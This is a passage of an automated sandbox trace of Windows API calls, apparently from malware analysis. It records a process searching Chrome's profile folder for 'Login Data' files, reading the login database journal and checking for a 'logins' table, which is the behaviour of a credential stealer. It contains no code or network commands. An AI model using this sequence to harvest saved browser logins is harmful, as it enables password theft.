dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.191] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x639fe0, libNewSize=0x56ff38) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0xa0) returned 0x5d1978 [0590.191] LocalFree (hMem=0x56ff38) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x23, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0590.191] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x639fe0, libOffset=0x28, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.191] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.191] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.191] lstrcmpiA (lpString1="stats", lpString2="logins") returned 1 [0590.191] LocalFree (hMem=0x58d548) returned 0x0 [0590.191] LocalFree (hMem=0x5d1978) returned 0x0 [0590.191] LocalFree (hMem=0x58d840) returned 0x0 [0590.191] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.191] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.191] LocalFree (hMem=0x570078) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x2f5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x2f5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x2f6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.191] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.191] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.191] IStream:LockRegion (This=0x57ea78, libOffset=0x2f7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.191] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.191] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.191] LocalFree (hMem=0x5e6798) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0590.192] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x58d840) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.192] LocalFree (hMem=0x58d840) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x17, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0590.192] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x1c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0xb1) returned 0x2ed72a0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.192] IStream:LockRegion (This=0x639fe0, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.192] IStream:SetSize (This=0x639fe0, libNewSize=0x2ed72a0) returned 0x0 [0590.192] LocalAlloc (uFlags=0x40, uBytes=0xb9) returned 0x5b7378 [0590.192] LocalFree (hMem=0x2ed72a0) returned 0x0 [0590.192] LocalFree (hMem=0x570078) returned 0x0 [0590.192] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.192] lstrcmpiA (lpString1="stats", lpString2="logins") returned 1 [0590.192] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.192] LocalFree (hMem=0x56ff38) returned 0x0 [0590.193] LocalFree (hMem=0x58d840) returned 0x0 [0590.193] LocalFree (hMem=0x58d548) returned 0x0 [0590.193] LocalFree (hMem=0x5b7378) returned 0x0 [0590.193] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.193] LocalFree (hMem=0x2ede058) returned 0x0 [0590.193] IUnknown:Release (This=0x57ea78) returned 0x0 [0590.193] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.193] lstrlenW (lpString="\\") returned 1 [0590.193] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.193] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.193] lstrlenW (lpString="Login Data-journal") returned 18 [0590.193] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.193] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63b4a0 [0590.193] LocalFree (hMem=0x5d1290) returned 0x0 [0590.193] StrStrIW (lpFirst="Login Data-journal", lpSrch="Login Data") returned="Login Data-journal" [0590.193] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52db70 | out: ppstm=0x52db70*=0x57ea78) returned 0x0 [0590.193] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.193] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.193] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb60, lpOverlapped=0x0 | out: lpBuffer=0x52cb68*, lpNumberOfBytesRead=0x52cb60*=0x0, lpOverlapped=0x0) returned 1 [0590.193] CloseHandle (hObject=0x5ac) returned 1 [0590.193] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.193] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.193] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.193] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.193] IUnknown:Release (This=0x57ea78) returned 0x0 [0590.193] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.193] lstrlenW (lpString="\\") returned 1 [0590.193] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.194] lstrlenW (lpString="Network Action Predictor") returned 24 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56c820 [0590.194] LocalFree (hMem=0x5d1290) returned 0x0 [0590.194] StrStrIW (lpFirst="Network Action Predictor", lpSrch="Login Data") returned 0x0 [0590.194] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.194] lstrlenW (lpString="\\") returned 1 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.194] lstrlenW (lpString="Network Action Predictor-journal") returned 32 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f778 [0590.194] LocalFree (hMem=0x5d1290) returned 0x0 [0590.194] StrStrIW (lpFirst="Network Action Predictor-journal", lpSrch="Login Data") returned 0x0 [0590.194] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.194] lstrlenW (lpString="\\") returned 1 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.194] lstrlenW (lpString="Preferences") returned 11 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63cfc0 [0590.194] LocalFree (hMem=0x5d1290) returned 0x0 [0590.194] StrStrIW (lpFirst="Preferences", lpSrch="Login Data") returned 0x0 [0590.194] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.194] lstrlenW (lpString="\\") returned 1 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.194] lstrlenW (lpString="previews_opt_out.db") returned 19 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63b5d8 [0590.194] LocalFree (hMem=0x5d1290) returned 0x0 [0590.194] StrStrIW (lpFirst="previews_opt_out.db", lpSrch="Login Data") returned 0x0 [0590.194] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.194] lstrlenW (lpString="\\") returned 1 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.194] lstrlenW (lpString="previews_opt_out.db-journal") returned 27 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56c968 [0590.194] LocalFree (hMem=0x5d1290) returned 0x0 [0590.194] StrStrIW (lpFirst="previews_opt_out.db-journal", lpSrch="Login Data") returned 0x0 [0590.194] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.194] lstrlenW (lpString="\\") returned 1 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.194] lstrlenW (lpString="README") returned 6 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5ed458 [0590.194] LocalFree (hMem=0x5d1290) returned 0x0 [0590.194] StrStrIW (lpFirst="README", lpSrch="Login Data") returned 0x0 [0590.194] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.194] lstrlenW (lpString="\\") returned 1 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.194] lstrlenW (lpString="Secure Preferences") returned 18 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.194] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63b710 [0590.194] LocalFree (hMem=0x5d1290) returned 0x0 [0590.194] StrStrIW (lpFirst="Secure Preferences", lpSrch="Login Data") returned 0x0 [0590.194] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.194] lstrlenW (lpString="\\") returned 1 [0590.194] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.195] lstrlenW (lpString="Shortcuts") returned 9 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x63d0e8 [0590.195] LocalFree (hMem=0x5d1290) returned 0x0 [0590.195] StrStrIW (lpFirst="Shortcuts", lpSrch="Login Data") returned 0x0 [0590.195] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.195] lstrlenW (lpString="\\") returned 1 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.195] lstrlenW (lpString="Shortcuts-journal") returned 17 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x63b848 [0590.195] LocalFree (hMem=0x5d1290) returned 0x0 [0590.195] StrStrIW (lpFirst="Shortcuts-journal", lpSrch="Login Data") returned 0x0 [0590.195] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.195] lstrlenW (lpString="\\") returned 1 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.195] lstrlenW (lpString="Top Sites") returned 9 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x63d210 [0590.195] LocalFree (hMem=0x5d1290) returned 0x0 [0590.195] StrStrIW (lpFirst="Top Sites", lpSrch="Login Data") returned 0x0 [0590.195] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.195] lstrlenW (lpString="\\") returned 1 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.195] lstrlenW (lpString="Top Sites-journal") returned 17 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x63b980 [0590.195] LocalFree (hMem=0x5d1290) returned 0x0 [0590.195] StrStrIW (lpFirst="Top Sites-journal", lpSrch="Login Data") returned 0x0 [0590.195] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.195] lstrlenW (lpString="\\") returned 1 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.195] lstrlenW (lpString="Visited Links") returned 13 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x63d338 [0590.195] LocalFree (hMem=0x5d1290) returned 0x0 [0590.195] StrStrIW (lpFirst="Visited Links", lpSrch="Login Data") returned 0x0 [0590.195] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.195] lstrlenW (lpString="\\") returned 1 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.195] lstrlenW (lpString="Web Data") returned 8 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x63d460 [0590.195] LocalFree (hMem=0x5d1290) returned 0x0 [0590.195] StrStrIW (lpFirst="Web Data", lpSrch="Login Data") returned 0x0 [0590.195] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.195] lstrlenW (lpString="\\") returned 1 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.195] lstrlenW (lpString="Web Data-journal") returned 16 [0590.195] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.195] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63bab8 [0590.195] LocalFree (hMem=0x5d1290) returned 0x0 [0590.195] StrStrIW (lpFirst="Web Data-journal", lpSrch="Login Data") returned 0x0 [0590.195] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.195] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.196] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.196] LocalFree (hMem=0x5e6088) returned 0x0 [0590.196] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.196] lstrcmpiW (lpString1="EVWhitelist", lpString2=".") returned 1 [0590.196] lstrcmpiW (lpString1="EVWhitelist", lpString2="..") returned 1 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.196] lstrlenW (lpString="\\") returned 1 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.196] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e6088 [0590.196] lstrlenW (lpString="EVWhitelist") returned 11 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.196] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0e30 [0590.196] LocalFree (hMem=0x5e6088) returned 0x0 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 67 [0590.196] lstrlenW (lpString="\\*.*") returned 4 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 67 [0590.196] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5d1290 [0590.196] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.196] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.196] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.196] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.196] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.196] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.196] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.196] LocalFree (hMem=0x5d1290) returned 0x0 [0590.196] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.196] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.196] lstrcmpiW (lpString1="FileTypePolicies", lpString2=".") returned 1 [0590.196] lstrcmpiW (lpString1="FileTypePolicies", lpString2="..") returned 1 [0590.196] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.196] lstrlenW (lpString="\\") returned 1 [0590.196] lstrlenW 